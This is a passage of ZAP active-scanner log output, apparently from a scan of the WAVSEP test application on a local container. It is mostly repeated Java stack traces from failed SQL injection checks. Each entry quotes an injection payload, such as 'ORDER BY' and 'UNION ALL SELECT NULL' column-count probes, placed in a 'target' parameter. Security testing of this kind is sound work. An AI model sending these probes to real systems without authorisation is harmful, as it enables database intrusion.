org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679694 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679695 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) ORDER BY 9459-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) ORDER BY 9459-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679696 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679697 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679697 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679698 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679699 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679700 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679701 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679701 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679702 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679703 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679704 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at 